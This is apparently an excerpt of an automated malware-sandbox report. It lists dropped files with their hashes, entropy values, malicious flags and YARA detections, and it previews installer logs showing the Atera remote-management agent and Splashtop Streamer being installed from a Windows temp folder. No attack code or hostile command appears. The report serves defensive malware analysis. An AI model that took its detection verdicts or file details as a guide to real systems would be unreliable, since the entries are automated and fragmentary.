                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNa8mE4Dp689:MxHKQwYHKGSI6oPtHTHhAHKKka8mHDpN
                                                                                                                                                                                                                                                                                              MD5:BDADAD127D5A6079C29C0C870A5C3C2C
                                                                                                                                                                                                                                                                                              SHA1:AD5D30886AE959F271CF777D386A31CD792C9A64
                                                                                                                                                                                                                                                                                              SHA-256:7186B9EAC66BD83E5E1C050D81529BC68511538118E65019EBECFD952C22FD55
                                                                                                                                                                                                                                                                                              SHA-512:198087F52C39A32ACE7A90E9212C2AA0F31EDF8349773C8C6C5495CA82C890F9A8A44356AC5AEBB42F3342E6BE981DC4BCFE1D7FB43760745D7240A117257725
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv7
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.1940658735648508
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:NlllulqXlZ:NllUq
                                                                                                                                                                                                                                                                                              MD5:E414B74A281C00450CBB2E9CF4B11859
                                                                                                                                                                                                                                                                                              SHA1:BD3716D303E828EAAFB6EE07A7C89D25C680B985
                                                                                                                                                                                                                                                                                              SHA-256:02A78FB5D84C588164968EA535CE17DB800C6219D2CD31E2DE668E5CF3AD047E
                                                                                                                                                                                                                                                                                              SHA-512:57E655BBADEC0B09A1E68F11DFC5D14E44C47F94832AB308D2F055A5F5F136B3699C192628888CBFC4A424DFAFFF8C8CD4DA37E40EBED420E72781627B1AC771
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with very long lines (319), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):225824
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.7943895654908313
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:ni6/faQ3VtgHCLgFNKnZG218vpATgaiCUC6mqsA0jRb1w1KgIgLQd6tYN8qpp/S6:nmvjq9g7w1jHBMkK9EG6L06D
                                                                                                                                                                                                                                                                                              MD5:EBDF76D5DA312F9E1AD5D2BBCB8DA599
                                                                                                                                                                                                                                                                                              SHA1:96BF4C8E90ED5E9735BBF9ECA42D0779EAF6A3AE
                                                                                                                                                                                                                                                                                              SHA-256:FFCF07B8119A7A36B6CE86F7EAD50147BD5620F43EA93642FF9BEA0234C14B47
                                                                                                                                                                                                                                                                                              SHA-512:A11B5880A3E30173A8F3E0C22596873AB5694D49E331722D83AC2A0195E7EA08DCFD5311C7BEC299590CBAC0E8F03C4F63C5860FDCB835D651FC477BD173CEA2
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\AteraSetupLog.txt, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
Preview:=== Verbose logging started: 06/01/2025  06:59:12  Build type: SHIP UNICODE 5.00.10011.00  Calling process: C:\Windows\SYSTEM32\msiexec.exe ===
MSI (c) (6C:8C) [06:59:12:988]: Resetting cached policy values
MSI (c) (6C:8C) [06:59:12:988]: Machine policy value 'Debug' is 0
MSI (c) (6C:8C) [06:59:12:988]: ******* RunEngine:
           ******* Product: C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi
           ******* Action: 
           ******* CommandLine: **********
MSI (c) (6C:8C) [06:59:
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4332
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.673128795836758
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:Yf+FZg1QVpOp1OiWbfeVtJ0Bd81cJK1cJcf3ieGykeGptJt4eP5MA:qUeSVpOp1OiWCCS37TgH
                                                                                                                                                                                                                                                                                              MD5:13268F6DC3EF0890EEA4E0C9272E182F
                                                                                                                                                                                                                                                                                              SHA1:270D53CBC7C40B0DDF4803F878EB71383A45161F
                                                                                                                                                                                                                                                                                              SHA-256:CCA7EB2BDBCF75B157D897BDFDC6FC7E01116543E8F55C53E54F44BB53FDA09A
                                                                                                                                                                                                                                                                                              SHA-512:F0C8FFC9F2001E06507BAA7A60889E55D015B963B445B2B7B88E5C92E317D79AA26E9CBF595449D3F15F5CEEC767B46096153075084580769A08DC82A687F279
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
Preview:=== Verbose logging started: 06/01/2025  06:59:25  Build type: SHIP UNICODE 5.00.10011.00  Calling process: C:\Windows\SysWOW64\msiexec.exe ===
MSI (c) (2C:74) [06:59:25:811]: Resetting cached policy values
MSI (c) (2C:74) [06:59:25:811]: Machine policy value 'Debug' is 0
MSI (c) (2C:74) [06:59:25:811]: ******* RunEngine:
           ******* Product: setup.msi
           ******* Action: 
           ******* CommandLine: **********
MSI (c) (2C:74) [06:59:25:811]: Client-side and UI is none 
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):56907920
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.937481143445435
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1572864:xnOdpvYs+cvrrjOAYfDJnEAOns5w5k8BzFl73BuvH:xQNLOAYfzOBO8B3dmH
                                                                                                                                                                                                                                                                                              MD5:9CD6BA3AD27DAC967F073CBCAD88FEF9
                                                                                                                                                                                                                                                                                              SHA1:FFE503C57539FD91A2F09EFE8FA44958AD96B4A2
                                                                                                                                                                                                                                                                                              SHA-256:248E1FC6DF40583AF705BB617F402092F1943F27416F5557AC9CEFE284761019
                                                                                                                                                                                                                                                                                              SHA-512:A9DA38896354174DED6A1D2AE548A5A797F6BF2A6CA6C8519FC2ED704C39E2D36E916FCB70FE3BB98201C5EB91667CD7D752BD07B4FFC1575526FF87FDBCFFCA
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: x64;1033, Revision Number: {911E9E2F-B38D-4D02-A148-5E49FC9D8943}, Create Time/Date: Wed Feb 28 10:52:04 2024, Last Saved Time/Date: Wed Feb 28 10:52:04 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2994176
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.878630966889847
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:49152:s+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oq1xMbY+K/tzQz:s+lUlz9FKbsodq0YaH7Z1xMb8tT
                                                                                                                                                                                                                                                                                              MD5:5E90226ABB5A004B0B9DB9A9E67BAC21
                                                                                                                                                                                                                                                                                              SHA1:34EB703055BAFA469A714F18C7F00E5098B764AF
                                                                                                                                                                                                                                                                                              SHA-256:BE0C53481ED4CF3EC4D0AD16053CD18D6AAD8C349B8281F5F9B90B526420CEAE
                                                                                                                                                                                                                                                                                              SHA-512:2676357D10AA76F09F2A1F691C7566D54E34B20716EDF1301B2D69C3E3400D0A70E7C1738AEA9A75334B384AB988CEA3A07B983C900AE32395285BE61673C288
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4932
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.6462220563524093
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:h05Z2iNzNUk9XA2fNVGmTNuNa9XAA8NVDTNQNl9XANKNVgRNXN49XAiHNV1aNtN6:EGmWP+dL0o
                                                                                                                                                                                                                                                                                              MD5:50B9809AC5B7457275BBE01FA26ABB1F
                                                                                                                                                                                                                                                                                              SHA1:EDC5CD5E33DD17EF9B115992CC81DB8887915F61
                                                                                                                                                                                                                                                                                              SHA-256:21EDAD87FC209175F6C9B4065CBE83520D2A1A6A0DFC1CB183DFC5F1750704C2
                                                                                                                                                                                                                                                                                              SHA-512:6AF9CF38A0A57278DF277747B7DDDEDEC0955061C831BE6C539CC905EADDD429EC78C13AFD840F7E353FAA17A822F102887C529B46D37F09128877BB612854E3
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
Preview:[7000]2025-01-06 06:59:19  [CUtility::OSInfo] OS 10.0(19045)  x64:1 (Last=0)
[7000]2025-01-06 06:59:19  [CUnPack::FindHeader] Name:C:\Windows\TEMP\SplashtopStreamer.exe (Last=0)
[7000]2025-01-06 06:59:19  [CUnPack::FindHeader] Sign Size:10240 (Last=0)
[7000]2025-01-06 06:59:19  [CUnPack::FindHeader] Header offset:434176 (Last=183)
[7000]2025-01-06 06:59:19  [CUnPack::UnPackFiles]  FreeSpace:180925497344 FileSize:53075456 (Last=0)
[7000]2025-01-06 06:59:19  [CUnPack::UnPackFiles] (1/5)UnPack
                                                                                                                                                                                                                                                                                              Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3383808
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.34380572306996
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:98304:nNOTMA1lvHRzotzo5YuCpvBgSq8/R58hgpwVHSSWU:7AXvRMtUiuCpJgSVR58hS1U
                                                                                                                                                                                                                                                                                              MD5:2C18826ADF72365827F780B2A1D5EA75
                                                                                                                                                                                                                                                                                              SHA1:A85B5EAE6EBA4AF001D03996F48D97F7791E36EB
                                                                                                                                                                                                                                                                                              SHA-256:AE06A5A23B6C61D250E8C28534ED0FFA8CC0C69B891C670FFAF54A43A9BF43BE
                                                                                                                                                                                                                                                                                              SHA-512:474FCE1EC243B9F63EA3D427EB1117AD2EBC5A122F64853C5015193E6727FFC8083C5938117B66E572DA3739FD0A86CD5BC118F374C690FA7A5FE9F0C071C167
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K.c...0...0...0...1...0...1...0..K0...0...1...0...1...0...18..0...1...0...1...0...0%..0...1...0..00...0..X0...0...1...0Rich...0........................PE..L.....Gg...............*.....r0..............0....@...........................3.....rM4...@..........................................P..@-/..........z3..(....3..'......p...............................@............0...............................text...(........................... ..`.rdata..n....0......................@..@.data...4....0......................@....rsrc...@-/..P..../..$..............@..@.reloc...'....3..(...R3.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15
                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9995812306460645
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:1X6AZJ:1qAX
                                                                                                                                                                                                                                                                                              MD5:56884732C1B8ABCBA0A31746DF533D97
                                                                                                                                                                                                                                                                                              SHA1:662FA5002ACCB46261763B57F6A772E0A2AA5DDF
                                                                                                                                                                                                                                                                                              SHA-256:A6212DAAA9A377B202A9436D80AB97BC9B0050DC7E174FCD35F255B34500CFAB
                                                                                                                                                                                                                                                                                              SHA-512:8D5817660238082002FB42447D3B614C5099C8C691D4D091BE54BDDC5958A854628083BCCA191E6E45C85E70A8C6DCB5D2CBB4E2A3E5D255F5695139347E539C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:PreVerCheck.exe
                                                                                                                                                                                                                                                                                              Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                              File Type:Generic INItialization configuration [REGPATH]
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1528
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.6192017888227515
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:Zem6aTKgWT8SoBz09LAjUeiKbd8fusQK5oqAeEVhqY0+c8Eo/VoijXOR+7G2eHNl:gi+Noh0dBeNbMoqvEV0Y0+bjjXD7FwNl
                                                                                                                                                                                                                                                                                              MD5:FC5DE1FEA9170B61439922A367A12478
                                                                                                                                                                                                                                                                                              SHA1:96941D31908B0CB49ADEABBDFCC43508F2B99B36
                                                                                                                                                                                                                                                                                              SHA-256:087BA98D89B1E1366D04A909AC09D109BB80A872B6D5C38E29568DBEE5B116F1
                                                                                                                                                                                                                                                                                              SHA-512:6423294E13EA896CE12E8369101CDEAF6EB467CC60A2852E5145BE12CD8EE1189A8508A59FAF504BB4BC90593F451EC09291662E6BD43438BBCAC57F2B69613B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:[CUSTOMSETTING]..REGEXTSECT=Splashtop Remote Server for Business..INSTDRV=0x81..BASEDTYPE=1....[REGPATH]..NUM=2..REGPATH_01=Splashtop Remote Server..REGPATH_02=Splashtop Remote Server for Business....;Common..[REGISTRY]..CSRSMode=1..confirm_d=1..EnableNvFBC=@NO:0..EnableADEM=@NO:0....;STE..[REGISTRY_Splashtop Remote Server for Business]..EnableAutoUpgrade=0..CloudUserAgent=@SX:business..EnableIQSV=0..USERTRACK_NAME=@SO:SCRS00....[PREVERCHECK]..PRODUCTID={B7C5EA94-B96A-41F5-BE95-25D78B486678}..UPGRADEID={001F085C-058A-480B-AD56-2940B857C38D}..PRODUCTNAME=Splashtop Streamer..SSUNAME=PROTOIRIS00..SSUPRODUCT=SVR..COMPATIBLE_NUM=4....[PREVERCHECKREG]..REGKEYPATH_NUM=2..REGKEYPATH_MAIN=0..REGKEYPATH_0=Splashtop Remote Server,1..REGKEYPATH_1=Splashtop Remote Server for Business,0....;ST2..[COMPATIBLE_0]..PRODUCTID={2EFEAD58-3311-4B2B-9D8A-8D663581D109}..UPGRADEID={001F085C-058A-480B-AD56-2940B857C38D}..SSUNAME=PROTOIRIS00..FORCESTEMODE=0....;S4B Prodcut name with Splashtop Streamer for Busine
                                                                                                                                                                                                                                                                                              Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 936, Title: Installation Database, Subject: Splashtop Streamer, Author: Splashtop Inc., Keywords: Installer,MSI,Database, Comments: Splashtop Streamer Installer, Create Time/Date: Wed Nov 27 19:46:34 2024, Name of Creating Application: InstallShield?2021 27, Security: 1, Template: Intel;0,1033,2052,1028,1036,1031,1040,1041,1042,1046,1049,1034, Last Saved By: Intel;2052, Revision Number: {B7C5EA94-B96A-41F5-BE95-25D78B486678}3.7.2.4;{B7C5EA94-B96A-41F5-BE95-25D78B486678}3.7.2.4;{001F085C-058A-480B-AD56-2940B857C38D}, Number of Pages: 200, Number of Characters: 1
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):53075456
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.963205524800128
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1572864:snOdpvYs+cvrrjOAYfDJnEAOns5w5k8BzFl73:sQNLOAYfzOBO8B3
                                                                                                                                                                                                                                                                                              MD5:94938EB1C2006B2C0A2B53F976F074D0
                                                                                                                                                                                                                                                                                              SHA1:85351B97E9EC8F6A81EE98EDAF3F22213C14EF7C
                                                                                                                                                                                                                                                                                              SHA-256:6FF1D88358B823C3390639FE740774AE1D6CADDB8E46C482D7F6104B403D3A3D
                                                                                                                                                                                                                                                                                              SHA-512:16F9285F7D9238E27E640241C25E154729B9CE33F2C3A9CDCF6F01633B9BE9B78550C43735A5C0316671E19B8A415E4DED9C2E4E23445268E871BFEBE2902856
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):988
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.127699291644866
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:RjUcBbUcBIP+ijUcBIDQUcBIPEUcBIDv0zWatYh7+ifPcPvo7PZn+i4TjnPTvY:9UQUhGijU90UhMU9odOyifEIzZ+i4PPc
                                                                                                                                                                                                                                                                                              MD5:5DBDCF8D475069C447F676D56327382B
                                                                                                                                                                                                                                                                                              SHA1:08A0CA9150DCFA9D46370A340F000504D7772032
                                                                                                                                                                                                                                                                                              SHA-256:EDAC85170F8B70F30E7F7080B34664B186B635520FFBC011CD9AB6257BAB78A8
                                                                                                                                                                                                                                                                                              SHA-512:81CE6716D4F58CEA4194FA5FF42EE22C2D2686DD0A097DC384E797411587A2071A4070E3ECF5B7E9571FF5D29C2DFD0ED197B6890D70BDFECE376E7E0340CEE1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:;Unistall..[{B7C5EA94-B96A-41F5-BE95-25D78B486678}-DlgOrder]..Dlg0={B7C5EA94-B96A-41F5-BE95-25D78B486678}-MessageBox-0..Count=2..Dlg1={B7C5EA94-B96A-41F5-BE95-25D78B486678}-SdFinish-0..[{B7C5EA94-B96A-41F5-BE95-25D78B486678}-MessageBox-0]..Result=6..[{B7C5EA94-B96A-41F5-BE95-25D78B486678}-SdFinish-0]..Result=1..bOpt1=0..bOpt2=0....;Unistall 140..[{9FF58A31-D391-4FEE-BBE6-61CCD093EF13}-DlgOrder]..Dlg0={9FF58A31-D391-4FEE-BBE6-61CCD093EF13}-MessageBox-0..Count=2..Dlg1={9FF58A31-D391-4FEE-BBE6-61CCD093EF13}-SdFinish-0..[{9FF58A31-D391-4FEE-BBE6-61CCD093EF13}-SdFinish-0]..Result=1..bOpt1=0..bOpt2=0..[{9FF58A31-D391-4FEE-BBE6-61CCD093EF13}-MessageBox-0]..Result=6..[{94A1911F-CD2F-4B9C-B171-2B43DCD213AA}-DlgOrder]..Dlg0={94A1911F-CD2F-4B9C-B171-2B43DCD213AA}-MessageBox-0..Count=2..Dlg1={94A1911F-CD2F-4B9C-B171-2B43DCD213AA}-SdFinish-0..[{94A1911F-CD2F-4B9C-B171-2B43DCD213AA}-MessageBox-0]..Result=6..[{94A1911F-CD2F-4B9C-B171-2B43DCD213AA}-SdFinish-0]..Result=1..bOpt1=0..bOpt2=0..
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.5701520453577955
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:sp8PhluRc06WXJsFT5SFgWbkqISoedGPdGfoOdrzST1StedGPdGRub1n:skhl1PFTlchI4QT1ox
                                                                                                                                                                                                                                                                                              MD5:E4BF5E06B9C0886D6CBFC3D68E095B0E
                                                                                                                                                                                                                                                                                              SHA1:7437D28CE9985FC0554FDFF9F991BDD1AD5C5BBA
                                                                                                                                                                                                                                                                                              SHA-256:0F5C40FDF1AEF16B0EC5FC509BB7567705A855ADFB45EAB045B649DD6242A38A
                                                                                                                                                                                                                                                                                              SHA-512:5E9F5B4701A1174A020BB6CB8D653DA54E63E4B474B074A691CC726AD1C4F8B6E296640F4CD9CE6E51CD48E4F83EDA499C1F8B1B9106F5563438F8E35C1D106F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF13A48084247EF5A1.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.2567140222927486
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:0gduksPveFXJhT5SFgWbkqISoedGPdGfoOdrzST1StedGPdGRub1n:9dr5TlchI4QT1ox
                                                                                                                                                                                                                                                                                              MD5:A30478549D793290405A8B0126F7C0C0
                                                                                                                                                                                                                                                                                              SHA1:A2435F6FD86F749B92BF2C41A966B2C036DBED70
                                                                                                                                                                                                                                                                                              SHA-256:AE2C0DF62B1CB042E660217586918E98DD0756DC50227E68F0308CAD95C6A331
                                                                                                                                                                                                                                                                                              SHA-512:6DCFE8EE240DE0FB2490AA86307F230F44BACC6FFF73DCF00C80E3FF3822A29479D86316F684B05A259765B8B9551495D49605C65B5889345E0B3C76C86E9A1F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
